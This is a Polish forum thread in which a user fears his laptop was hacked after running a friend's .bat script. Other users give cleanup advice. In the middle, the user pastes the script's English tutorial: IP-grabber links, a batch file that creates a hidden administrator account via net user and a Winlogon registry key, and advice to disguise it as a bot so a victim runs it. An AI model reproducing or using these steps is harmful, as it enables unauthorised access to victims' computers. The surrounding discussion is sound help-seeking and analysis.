Ktoś chce mi się włamać do komputera

Co mam zrobić jeśli ktoś się chce mi się włamać do komputera. (mam laptopa ale będę pisać komputer bo mi wygodniej) dzieje mi sie ta odkąd chciałem zobaczyć taki jeden skrypt z kolegą (jeśli będzie wam to potrzebne to go wyśle) ten skrypt był w .bat musiałem wpisać tam login i hasło do komputera i to zrobiłem jak się okazało ok tydzień puźniej komp zaczą mi wariować 1 miał dostęp do moich plików i zmienił mi hasło steam bo miałem zapisane passy w notatniku (z tego to wywnioskowałem) 2 jak sobie grałem o ok 2 w nocy to zaczą mi świrować ekran nie wie jak to opisać jak rzucałem skillem to ten zamiast być złoty to był czarny miałem kilka ekranów na jednym ekranie. wtedy postanowiłem że go zrestartuje. po restarcie pisało coś w stylu niedokończono konfiguracji windows ale nie jestem pewien bo nie doczytałem dzisiaj otwieram mojego anty virusa McAfee a tam na chwile obecną pizse ,do tej pory ochroniliśmy cię przed 364 ryzykownymi połączeniami’’ i co 2 jest inny adres ip ostatnie było ok 5 min temu. naszczęscie mam dobrego firewalla przez McAfee ale i tak sie obawiam o swoje bezpieczęstwo bo myśle że to kwestia czasu aż on sie do mnie dobije. proszę o porady z góry dziękuje

PS: po zrestartowaniu komputera włączył mi sie wiersz poleceń na sekunde i w wiersz poleceń wpisywałem login i chasło

Ten skrypt to był ewidentnie wirus. Sprawdź, czy masz zrobione przywracanie systemu przed datą otworzenia tego dziadostwa

Zapoznaj się z tym i zrób według instrukcji: Raport obowiązkowy - Farbar Recovery Scan Tool
A temat przenosimy do działu bezpieczeństwo.

Nawet nie musiał się włamywać, sam mu podałeś login i hasło.

  1. Usunięcie wszystkich partycji i format.
  2. Reinstalacja systemu.
  3. Wyłączenie niebezpiecznych usług np. UPnP.
  4. Instalacja WYŁĄCZNIE sprawdzonego oprogramowania z oficjalnych źródeł.

Jak nie wiadomo jak pomóc, to to najłatwiejsza droga. xD

@voxcordi, nie zrozumiałeś, dlaczego to powiedziałem. Jak można pomóc i niekoniecznie trzeba formata, to po co iść musi zrobić format? Tylko tak szczerze?

Podeślij obejrzę.Na linuxie w piaskownicy.

Bo to jedyny słuszny sposób na poradzenie sobie z zainfekowanym (czyt. skompromitowanym) systemem.

2lajki

Można też i na Windowsie, bo

czyli wystarczy nie uruchamiać, a podejrzeć zawartość i wszystko będzie jasne. O ile to jest tylko ten jeden plik i nie ma tam odwołań do innych .bat (komendą call), czy po prostu jakiegoś exe-ka.

Działa też na innych lin:

@jajecpl oto ten skrypt z instrukcją

first of all, you need the IP Address

IP Address: Generate a Link which you send to your victim. If he clicks it, his IP will be sent to your email inbox.

http://getthierip.com
http://whatstheirip.com

  • then, open up notepad and write this commands:

cd
cls
REM “WhatEverYouWantNameIt”
REM ------------------------------
@echo off
set /p user=PLS INSERT YOUR USER :
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v %user% /t REG_DWORD /d 0
pause

  • it’s done! save it as the batch file (.bat)
  • named whatever you want,

ok after get him IP address you need to give them this batch file!
for that, you can change it to .exe file or put this Batch in a program file, you can put in an instagrambot or viewbot or anything, and name it to program name! and told the victim to open it first! if he/she click on it make a HiddenUser on the Computer
and what you gonna do is connect him with Remote access app(you can find it on windows search bar) and IP address you got before!

Można te punkty napisać tak żebym mógł zrozumieć

Robiłem restart laptopa i nie ma żadnych problemów ale się boję że w końcu dobije się ponownie do mnie

Napisałem, co masz zrobić i zignorowałeś. Na 100% jest syf. I najpierw oceniłby to np. @iJuliusz po logach. I możeby się obeszło bez formatów.

1lajk

czyli mam zrobić to co pierwsze napisałeś??

Dokładnie. Wrzucić logi do tematu. Link do instrukcji podałem.

z kąd te logi. jak to chciałem pobrać to pisało ze windows obronil komputer

Shortcut.txt (32,9 KB) Addition.txt (40,4 KB) FRST.txt (147,6 KB)

1lajk

Krótkie objaśnienie. Logi tworzysz za pomocą frst na twoim sprzęcie. Link jest tylko z instrukcją jak to zrobić i jak przykładowo się zapisują logi.

Te komendy z pliku .bat tworzą w systemie użytkownika z hasłem, które podajesz w trakcie jego działania, a następnie dodają go do grupy “administratorzy” i ukrywają z ekranu logowania.
Tak działało to w XP, gdzie sam to robiłem, ale czy to działa tak w Windows 10, to nie wiem. Mówię oczywiście o ukrywaniu konta.

Samo konto, które zakładasz jest lokalne, bez znajomości tych danych jednak nikt na nie się nie zaloguje. Nawet znając IP.

Oczywiście jak ktoś poda komuś innemu te dane i jednocześnie zainstaluje sobie jakieś VNC, to sprawa się komplikuje, no ale…